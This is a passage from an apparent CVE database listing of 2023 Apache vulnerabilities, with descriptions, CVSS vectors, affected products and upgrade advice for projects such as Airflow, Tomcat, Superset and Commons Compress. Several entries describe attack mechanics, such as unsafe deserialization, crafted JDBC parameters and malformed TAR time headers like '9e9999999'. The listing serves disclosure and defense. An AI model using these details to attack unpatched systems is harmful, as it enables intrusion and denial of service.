Improper Input Validation vulnerability in Apache Traffic Server with malformed HTTP/2 frames. This issue affects Apache Traffic Server: from 9.0.0 through 9.2.2. Users are recommended to upgrade to version 9.2.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 37
fedoraproject fedora 38
apache traffic_server *
CVE-2023-39508

Execution with Unnecessary Privileges and Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow. The "Run Task" feature enables an authenticated user to bypass some of the restrictions put in place. It allows the user to execute code in the webserver context and to bypass the limitations on which DAGs the user may access. The "Run Task" feature is considered dangerous and has been removed entirely in Airflow 2.6.0. This issue affects Apache Airflow: before 2.6.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-39553

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow Drill Provider. Apache Airflow Drill Provider is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection with DrillHook, giving an opportunity to read files on the Airflow server. This issue affects Apache Airflow Drill Provider: before 2.4.3. It is recommended to upgrade to a version that is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-drill *
CVE-2023-39913

Deserialization of Untrusted Data, Improper Input Validation vulnerability in Apache UIMA Java SDK. This issue affects Apache UIMA Java SDK: before 3.5.0. Users are recommended to upgrade to version 3.5.0, which fixes the issue.

There are several locations in the code where serialized Java objects are deserialized without verifying the data. This affects in particular:
* the deserialization of a Java-serialized CAS, but also other binary CAS formats that include TSI information, using the CasIOUtils class;
* the CAS Editor Eclipse plugin, which uses the CasIOUtils class to load data;
* the deserialization of a Java-serialized CAS by the Vinci Analysis Engine service, which can receive Java-serialized CAS objects over network connections;
* the CasAnnotationViewerApplet and the CasTreeViewerApplet;
* the checkpointing feature of the CPE module.

Note that the UIMA framework by default does not start any remotely accessible services (i.e. Vinci) that would be vulnerable to this issue. A user or developer would need to make an active choice to start such a service. However, users or developers may use CasIOUtils in their own applications and services to parse serialized CAS data. They are affected by this issue unless they ensure that the data passed to CasIOUtils is not a serialized Java object. When using Vinci or using CasIOUtils in own services/applications, the unrestricted deserialization of Java-serialized CAS files may allow arbitrary (remote) code execution.

As a remedy, it is possible to set up a global or context-specific ObjectInputFilter (cf. https://openjdk.org/jeps/290 and https://openjdk.org/jeps/415) if running UIMA on a Java version that supports it. Note that Java 1.8 does not support the ObjectInputFilter, so there is no remedy when running on this out-of-support platform. An upgrade to a recent Java version is strongly recommended if you need to secure a UIMA version that is affected by this issue.

To mitigate the issue on a Java 9+ platform, you can configure a filter pattern through the "jdk.serialFilter" system property, using a semicolon as a separator. To allow deserializing Java-serialized binary CASes, add the classes:
* org.apache.uima.cas.impl.CASCompleteSerializer
* org.apache.uima.cas.impl.CASMgrSerializer
* org.apache.uima.cas.impl.CASSerializer
* java.lang.String

To allow deserializing CPE Checkpoint data, add the following classes (and any custom classes your application uses to store its checkpoints):
* org.apache.uima.collection.impl.cpm.CheckpointData
* org.apache.uima.util.ProcessTrace
* org.apache.uima.util.impl.ProcessTrace_impl
* org.apache.uima.collection.base_cpm.SynchPoint

Make sure to use "!*" as the final component of the filter pattern to disallow deserialization of any classes not listed in the pattern. Apache UIMA 3.5.0 uses tightly scoped ObjectInputFilters when reading Java-serialized data, depending on the type of data being expected. Configuring a global filter is not necessary with this version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache uimaj *
CVE-2023-40037

Apache NiFi 1.21.0 through 1.23.0 support JDBC and JNDI JMS access in several Processors and Controller Services with connection URL validation that does not provide sufficient protection against crafted inputs. An authenticated and authorized user can bypass connection URL validation using custom input formatting. The resolution enhances connection URL validation and introduces validation for additional related properties. Upgrading to Apache NiFi 1.23.1 is the recommended mitigation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-40195

Deserialization of Untrusted Data, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Software Foundation Apache Airflow Spark Provider. When the Apache Spark provider is installed on an Airflow deployment, an Airflow user who is authorized to configure Spark hooks can effectively run arbitrary code on the Airflow node by pointing it at a malicious Spark server. Prior to version 4.1.3, this was not called out explicitly in the documentation, so it is possible that administrators granted authorization to configure Spark hooks without taking this into account. We recommend that administrators review their configurations to make sure the authorization to configure Spark hooks is only granted to fully trusted users. To view the warning in the docs, please visit https://airflow.apache.org/docs/apache-airflow-providers-apache-spark/4.1.3/connections/spark.html

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache airflow_spark_provider *
CVE-2023-40272

Apache Airflow Spark Provider, versions before 4.1.3, is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection, giving an opportunity to read files on the Airflow server. It is recommended to upgrade to a version that is not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-spark *
CVE-2023-40273

The session fixation vulnerability allowed an authenticated user to continue accessing the Airflow webserver even after the user's password had been reset by the admin, up until the expiry of the user's session. Other than manually cleaning the session database (for the database session backend), or changing the secure_key and restarting the webserver, there was no mechanism to force-logout the user (and, with that, all other users). With this fix implemented, when using the database session backend, the existing sessions of the user are invalidated when the user's password is reset. When using the securecookie session backend, the sessions are NOT invalidated and still require changing the secure key and restarting the webserver (and logging out all other users), but the user resetting the password is informed about it with a flash message warning displayed in the UI. Documentation is also updated to explain this behaviour. Users of Apache Airflow are advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-40610

Improper authorization check and possible privilege escalation in Apache Superset up to but excluding 2.1.2. Using the default examples database connection, which allows access to both the examples schema and Apache Superset's metadata database, an attacker using a specially crafted CTE SQL statement could change data in the metadata database. This weakness could result in tampering with the authentication/authorization data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.3 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N 1.8 4.0
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache superset *
CVE-2023-40611

Apache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. Users should upgrade to version 2.7.1 or later which has removed the vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-40712

Apache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated users who have access to see the task/dag in the UI, to craft a URL, which could lead to unmasking the secret configuration of the task that otherwise would be masked in the UI. Users are strongly advised to upgrade to version 2.7.1 or later which has removed the vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-40743

** UNSUPPORTED WHEN ASSIGNED ** When integrating Apache Axis 1.x in an application, it may not have been obvious that looking up a service through "ServiceFactory.getService" allows potentially dangerous lookup mechanisms such as LDAP. When passing untrusted input to this API method, this could expose the application to DoS, SSRF and even attacks leading to RCE. As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. As a workaround, you may review your code to verify no untrusted or unsanitized input is passed to "ServiceFactory.getService", or by applying the patch from https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210 . The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache axis *
CVE-2023-41080

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in the FORM authentication feature of Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92. Older, EOL versions may also be affected. The vulnerability is limited to the ROOT (default) web application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2023-41081

Important: Authentication Bypass CVE-2023-41081

In some circumstances, such as when a configuration included "JkOptions +ForwardDirectories" but did not provide explicit mounts for all possible proxied requests, the mod_jk component of Apache Tomcat Connectors would use an implicit mapping and map the request to the first defined worker. Such an implicit mapping could result in the unintended exposure of the status worker and/or bypass security constraints configured in httpd. As of JK 1.2.49, the implicit mapping functionality has been removed and all mappings must now be via explicit configuration. Only mod_jk is affected by this issue. The ISAPI redirector is not affected. This issue affects Apache Tomcat Connectors (mod_jk only): from 1.2.0 through 1.2.48. Users are recommended to upgrade to version 1.2.49, which fixes the issue.

History
2023-09-13 Original advisory
2023-09-28 Updated summary

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat_connectors *
CVE-2023-41180

Incorrect certificate validation in InvokeHTTP on Apache NiFi MiNiFi C++ versions 0.13 to 0.14 allows an intermediary to present a forged certificate during TLS handshake negotiation. The Disable Peer Verification property of InvokeHTTP was effectively flipped, disabling verification by default when using HTTPS. Mitigation: Set the Disable Peer Verification property of InvokeHTTP to true when using MiNiFi C++ versions 0.13.0 or 0.14.0. Upgrading to MiNiFi C++ 0.15.0 corrects the default behavior.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache nifi_minifi_c++ *
CVE-2023-41267

In the Apache Airflow HDFS Provider, versions prior to 4.1.1, the documentation pointed users to install an incorrect pip package. As this package name was unclaimed, in theory an attacker could have claimed the package and provided code that would be executed when the package was installed. The Airflow team has since taken ownership of the package (neutralizing the risk) and fixed the doc strings in version 4.1.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache airflow_hdfs_provider *
CVE-2023-41313

The authentication method in Apache Doris versions before 2.0.0 was vulnerable to timing attacks. Users are recommended to upgrade to version 2.0.0 or later, or to 1.2.8, which fixes this issue.

Products Affected

Vendor Product Version
apache doris *
CVE-2023-41314

The APIs /api/snapshot and /api/get_log_file allowed unauthenticated access. This could allow a DoS attack or retrieval of arbitrary files from the FE node. Please upgrade to 2.0.3 to fix these issues.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H 3.9 4.2

Products Affected

Vendor Product Version
apache doris *
CVE-2023-41752

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 8.1.8, from 9.0.0 through 9.2.2. Users are recommended to upgrade to version 8.1.9 or 9.2.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 37
fedoraproject fedora 38
apache traffic_server *
CVE-2023-41834

Improper Neutralization of CRLF Sequences in HTTP Headers in Apache Flink Stateful Functions 3.1.0, 3.1.1 and 3.2.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via crafted HTTP requests. Attackers could potentially inject malicious content into the HTTP response that is sent to the user's browser. Users should upgrade to Apache Flink Stateful Functions version 3.3.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache flink_stateful_functions *
CVE-2023-41835

When a multipart request is performed but some of the fields exceed the maxStringLength limit, the uploaded files remain in struts.multipart.saveDir even if the request has been denied. Users are recommended to upgrade to Struts 2.5.32, 6.1.2.2, or 6.3.0.1 or greater, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache struts *
CVE-2023-41916

In Apache Linkis <=1.4.0, due to the lack of effective filtering of parameters, an attacker configuring malicious MySQL JDBC parameters in the DataSource Manager Module will trigger arbitrary file reading. Therefore, the parameters in the MySQL JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis <= 1.4.0 will be affected. We recommend users upgrade Linkis to version 1.5.0.

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-42501

Unnecessary read permissions within the Gamma role would allow authenticated users to read configured CSS templates and annotations. This issue affects Apache Superset: before 2.1.2. Users should upgrade to version 2.1.2 or above and run `superset init` to reconstruct the Gamma role, or remove the `can_read` permission from the mentioned resources.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42502

An authenticated attacker with update datasets permission could change a dataset link to an untrusted site by spoofing the HTTP Host header; users could be redirected to this site when clicking on that specific dataset. This issue affects Apache Superset versions before 3.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42503

Improper Input Validation, Uncontrolled Resource Consumption vulnerability in Apache Commons Compress in TAR parsing. This issue affects Apache Commons Compress: from 1.22 before 1.24.0. Users are recommended to upgrade to version 1.24.0, which fixes the issue.

A third party can create a malformed TAR file by manipulating file modification time headers, which, when parsed with Apache Commons Compress, will cause a denial of service issue via CPU consumption. In version 1.22 of Apache Commons Compress, support was added for file modification times with higher precision (issue COMPRESS-612 [1]). The format for the PAX extended headers carrying this data consists of two numbers separated by a period [2], indicating seconds and subsecond precision (for example "1647221103.5998539"). The impacted fields are "atime", "ctime", "mtime" and "LIBARCHIVE.creationtime". No input validation is performed prior to the parsing of header values. Parsing of these numbers uses the BigDecimal [3] class from the JDK, which has a publicly known algorithmic complexity issue when doing operations on large numbers, causing denial of service (see issue JDK-6560193 [4]). A third party can manipulate file time headers in a TAR file by placing a number with a very long fraction (300,000 digits) or a number with exponent notation (such as "9e9999999") within a file modification time header, and the parsing of files with these headers will take hours instead of seconds, leading to a denial of service via exhaustion of CPU resources. This issue is similar to CVE-2012-2098 [5].

Only applications using the CompressorStreamFactory class (with auto-detection of file types), TarArchiveInputStream and TarFile classes to parse TAR files are impacted. Since this code was introduced in v1.22, only that version and later versions are impacted.

[1]: https://issues.apache.org/jira/browse/COMPRESS-612
[2]: https://pubs.opengroup.org/onlinepubs/9699919799/utilities/pax.html#tag_20_92_13_05
[3]: https://docs.oracle.com/javase/8/docs/api/java/math/BigDecimal.html
[4]: https://bugs.openjdk.org/browse/JDK-6560193
[5]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2098

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2023-42504

An authenticated malicious user could initiate multiple concurrent requests, each requesting multiple dashboard exports, leading to a possible denial of service. This issue affects Apache Superset: before 3.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6
security@apache.org 5.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H 1.3 4.0

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42505

An authenticated user with read permissions on database connections metadata could potentially access sensitive information such as the connection's username. This issue affects Apache Superset before 3.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-42663

Apache Airflow, versions before 2.7.2, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. Users of Apache Airflow are advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42780

Apache Airflow, versions prior to 2.7.2, contains a security vulnerability that allows authenticated users of Airflow to list warnings for all DAGs, even if the user had no permission to see those DAGs. It would reveal the dag_ids and the stack-traces of import errors for those DAGs with import errors. Users of Apache Airflow are advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42781

Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs. This is a different issue than CVE-2023-42663 but leads to a similar outcome. Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42792

Apache Airflow, in versions prior to 2.7.2, contains a security vulnerability that allows an authenticated user with limited access to some DAGs, to craft a request that could give the user write access to various DAG resources for DAGs that the user had no access to, thus, enabling the user to clear DAGs they shouldn't. Users of Apache Airflow are strongly advised to upgrade to version 2.7.2 or newer to mitigate the risk associated with this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-42794

Incomplete Cleanup vulnerability in Apache Tomcat. The internal fork of Commons FileUpload packaged with Apache Tomcat 9.0.70 through 9.0.80 and 8.5.85 through 8.5.93 included an unreleased, in progress refactoring that exposed a potential denial of service on Windows if a web application opened a stream for an uploaded file but failed to close the stream. The file would never be deleted from disk creating the possibility of an eventual denial of service due to the disk being full. Other, EOL versions may also be affected. Users are recommended to upgrade to version 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2023-42795

Incomplete Cleanup vulnerability in Apache Tomcat. When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process, leading to information leaking from the current request/response to the next. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat 9.0.0
debian debian_linux 10.0
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2023-43123

On unix-like systems, the temporary directory is shared between all users. As such, writing to this directory using APIs that do not explicitly set the file/directory permissions can lead to information disclosure. Of note, this does not impact modern macOS operating systems. The method File.createTempFile on unix-like systems creates a file with a predefined name (so easily identifiable) and by default will create this file with the permissions -rw-r--r--. Thus, if sensitive information is written to this file, other local users can read this information. File.createTempFile(String, String) will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. This affects the class https://github.com/apache/storm/blob/master/storm-core/src/jvm/org/apache/storm/utils/TopologySpoutLag.java#L99 and was introduced by https://issues.apache.org/jira/browse/STORM-3123. In practice, this has a very limited impact, as this class is used only if ui.disable.spout.lag.monitoring is set to false, and its value is true by default. Moreover, the temporary file gets deleted soon after its creation. The solution is to use Files.createTempFile (https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/nio/file/Files.html#createTempFile(java.lang.String,java.lang.String,java.nio.file.attribute.FileAttribute...)) instead. We recommend that all users upgrade to the latest version of Apache Storm.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

Products Affected

Vendor Product Version
apache storm *
CVE-2023-43622

An attacker opening an HTTP/2 connection with an initial window size of 0 was able to block handling of that connection indefinitely in Apache HTTP Server. This could be used to exhaust worker resources in the server, similar to the well known "slow loris" attack pattern. This has been fixed in version 2.4.58, so that such connections are terminated properly after the configured connection timeout. This issue affects Apache HTTP Server: from 2.4.55 through 2.4.57. Users are recommended to upgrade to version 2.4.58, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2023-43666

Insufficient Verification of Data Authenticity vulnerability in Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.8.0. A general user can view all user data like an Admin account. Users are advised to upgrade to Apache InLong 1.9.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8623

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-43667

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') vulnerability in Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.8.0. The attacker can create misleading or false log records, making it harder to audit and trace malicious activities. Users are advised to upgrade to Apache InLong 1.9.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8628

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-43668

Authorization Bypass Through User-Controlled Key vulnerability in Apache InLong. This issue affects Apache InLong from 1.4.0 through 1.8.0: some sensitive parameter checks, such as "autoDeserizalize" and "allowLoadLocalInfile", can be bypassed. Users are advised to upgrade to Apache InLong 1.9.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/8604

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-43701

Improper payload validation and an improper REST API response type made it possible for an authenticated malicious actor to store malicious code in a Chart's metadata; this code could be executed if a user accesses a specific deprecated API endpoint. This issue affects Apache Superset versions prior to 2.1.2. Users are recommended to upgrade to version 2.1.2, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-43826

Apache Guacamole 1.5.3 and older do not consistently ensure that values received from a VNC server will not result in integer overflow. If a user connects to a malicious or compromised VNC server, specially-crafted data could result in memory corruption, possibly allowing arbitrary code to be executed with the privileges of the running guacd process. Users are recommended to upgrade to version 1.5.4, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9
security@apache.org 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache guacamole *
CVE-2023-44312

Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center. This issue affects Apache ServiceComb Service-Center versions up to and including 2.1.0. Users are recommended to upgrade to version 2.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
security@apache.org 5.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache servicecomb *
CVE-2023-44313

Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests. This issue affects Apache ServiceComb versions up to and including 2.1.0. Users are recommended to upgrade to version 2.2.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.6 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L 2.8 4.7
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache servicecomb *
CVE-2023-44483

